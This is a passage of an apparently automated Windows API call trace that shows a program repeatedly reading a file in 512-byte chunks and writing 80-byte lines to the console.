(hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.921] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.921] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.922] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.922] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.923] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.923] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.924] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.924] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.925] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.925] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] GetFileType (hFile=0x4c) returned 0x1 [0092.926] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.926] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.926] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.926] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.927] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] GetFileType (hFile=0x4c) returned 0x1 [0092.927] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.927] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.927] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.927] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.927] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, 